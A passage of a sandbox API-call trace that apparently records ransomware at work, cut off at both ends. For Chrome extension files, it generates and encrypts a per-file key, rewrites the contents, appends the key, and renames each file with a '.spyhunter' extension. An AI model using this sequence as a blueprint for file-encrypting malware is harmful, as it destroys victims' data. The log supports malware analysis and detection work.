"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png.spyhunter")) returned 1 [0136.653] GetProcessHeap () returned 0x2c0000 [0136.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.653] GetProcessHeap () returned 0x2c0000 [0136.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.653] GetProcessHeap () returned 0x2c0000 [0136.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3a70 | out: hHeap=0x2c0000) returned 1 [0136.653] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f510 | out: pbBuffer=0x57f510) returned 1 [0136.653] GetProcessHeap () returned 0x2c0000 [0136.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.654] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f508*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f508*=0x30) returned 1 [0136.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.654] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png") returned 142 [0136.654] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0136.654] GetProcessHeap () returned 0x2c0000 [0136.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.654] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f4cc*=0xc8d, lpOverlapped=0x0) returned 1 [0136.691] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffff373, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.691] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc8d, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f4cc*=0xc8d, lpOverlapped=0x0) returned 1 [0136.691] GetProcessHeap () returned 0x2c0000 [0136.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.691] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.691] WriteFile (in: hFile=0x180, lpBuffer=0x57f50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x57f50c*, lpNumberOfBytesWritten=0x57f4cc*=0x4, lpOverlapped=0x0) returned 1 [0136.691] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4cc*=0x30, lpOverlapped=0x0) returned 1 [0136.692] CloseHandle (hObject=0x180) returned 1 [0136.692] GetProcessHeap () returned 0x2c0000 [0136.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.692] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.spyhunter") returned 152 [0136.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.spyhunter")) returned 1 [0136.693] GetProcessHeap () returned 0x2c0000 [0136.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.693] GetProcessHeap () returned 0x2c0000 [0136.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.693] GetProcessHeap () returned 0x2c0000 [0136.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3908 | out: hHeap=0x2c0000) returned 1 [0136.694] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f508 | out: pbBuffer=0x57f508) returned 1 [0136.694] GetProcessHeap () returned 0x2c0000 [0136.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.694] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f500*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f500*=0x30) returned 1 [0136.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json") returned 155 [0136.713] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.713] GetProcessHeap () returned 0x2c0000 [0136.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.713] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f4c4*=0xe2, lpOverlapped=0x0) returned 1 [0136.714] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.715] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x57f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f4c4*=0xe2, lpOverlapped=0x0) returned 1 [0136.715] GetProcessHeap () returned 0x2c0000 [0136.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.715] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.715] WriteFile (in: hFile=0x180, lpBuffer=0x57f504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4c4, lpOverlapped=0x0 | out: lpBuffer=0x57f504*, lpNumberOfBytesWritten=0x57f4c4*=0x4, lpOverlapped=0x0) returned 1 [0136.715] WriteFile (in: hFile=0x180, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4c4*=0x30, lpOverlapped=0x0) returned 1 [0136.715] CloseHandle (hObject=0x180) returned 1 [0136.716] GetProcessHeap () returned 0x2c0000 [0136.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.716] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.spyhunter") returned 165 [0136.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0136.717] GetProcessHeap () returned 0x2c0000 [0136.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.717] GetProcessHeap () returned 0x2c0000 [0136.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.717] GetProcessHeap () returned 0x2c0000 [0136.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e4b0 | out: hHeap=0x2c0000) returned 1 [0136.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f500 | out: pbBuffer=0x57f500) returned 1 [0136.718] GetProcessHeap () returned 0x2c0000 [0136.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.718] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4f8*=0x30) returned 1 [0136.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0136.736] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.736] GetProcessHeap () returned 0x2c0000 [0136.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.736] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4bc*=0xdb, lpOverlapped=0x0) returned 1 [0136.737] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.737] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x57f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4bc*=0xdb, lpOverlapped=0x0) returned 1 [0136.737] GetProcessHeap () returned 0x2c0000 [0136.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.737] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.738] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4bc, lpOverlapped=0x0 | out: lpBuffer=0x57f4fc*, lpNumberOfBytesWritten=0x57f4bc*=0x4, lpOverlapped=0x0) returned 1 [0136.738] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4bc*=0x30, lpOverlapped=0x0) returned 1 [0136.738] CloseHandle (hObject=0x18c) returned 1 [0136.738] GetProcessHeap () returned 0x2c0000 [0136.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.738] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.spyhunter") returned 165 [0136.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0136.739] GetProcessHeap () returned 0x2c0000 [0136.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.739] GetProcessHeap () returned 0x2c0000 [0136.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.739] GetProcessHeap () returned 0x2c0000 [0136.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e7c0 | out: hHeap=0x2c0000) returned 1 [0136.740] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4f8 | out: pbBuffer=0x57f4f8) returned 1 [0136.740] GetProcessHeap () returned 0x2c0000 [0136.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4f0*=0x30) returned 1 [0136.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.743] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json") returned 155 [0136.743] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.743] GetProcessHeap () returned 0x2c0000 [0136.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.743] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4b4*=0xec, lpOverlapped=0x0) returned 1 [0136.744] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.744] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x57f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4b4*=0xec, lpOverlapped=0x0) returned 1 [0136.744] GetProcessHeap () returned 0x2c0000 [0136.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.745] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.745] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4b4, lpOverlapped=0x0 | out: lpBuffer=0x57f4f4*, lpNumberOfBytesWritten=0x57f4b4*=0x4, lpOverlapped=0x0) returned 1 [0136.745] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4b4*=0x30, lpOverlapped=0x0) returned 1 [0136.745] CloseHandle (hObject=0x18c) returned 1 [0136.745] GetProcessHeap () returned 0x2c0000 [0136.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.745] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.spyhunter") returned 165 [0136.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0136.746] GetProcessHeap () returned 0x2c0000 [0136.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.746] GetProcessHeap () returned 0x2c0000 [0136.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.746] GetProcessHeap () returned 0x2c0000 [0136.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cf40 | out: hHeap=0x2c0000) returned 1 [0136.748] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4f0 | out: pbBuffer=0x57f4f0) returned 1 [0136.748] GetProcessHeap () returned 0x2c0000 [0136.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.748] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4e8*=0x30) returned 1 [0136.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0136.750] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.750] GetProcessHeap () returned 0x2c0000 [0136.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.750] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f4ac*=0x10a, lpOverlapped=0x0) returned 1 [0136.751] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.751] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x57f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f4ac*=0x10a, lpOverlapped=0x0) returned 1 [0136.752] GetProcessHeap () returned 0x2c0000 [0136.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.752] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.752] WriteFile (in: hFile=0x18c, lpBuffer=0x57f4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f4ac, lpOverlapped=0x0 | out: lpBuffer=0x57f4ec*, lpNumberOfBytesWritten=0x57f4ac*=0x4, lpOverlapped=0x0) returned 1 [0136.752] WriteFile (in: hFile=0x18c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f4ac*=0x30, lpOverlapped=0x0) returned 1 [0136.752] CloseHandle (hObject=0x18c) returned 1 [0136.752] GetProcessHeap () returned 0x2c0000 [0136.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.752] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.spyhunter") returned 165 [0136.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0136.753] GetProcessHeap () returned 0x2c0000 [0136.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.753] GetProcessHeap () returned 0x2c0000 [0136.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0136.753] GetProcessHeap () returned 0x2c0000 [0136.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d560 | out: hHeap=0x2c0000) returned 1 [0136.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f4e8 | out: pbBuffer=0x57f4e8) returned 1 [0136.755] GetProcessHeap () returned 0x2c0000 [0136.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0136.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f4e0*=0x30) returned 1 [0136.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, 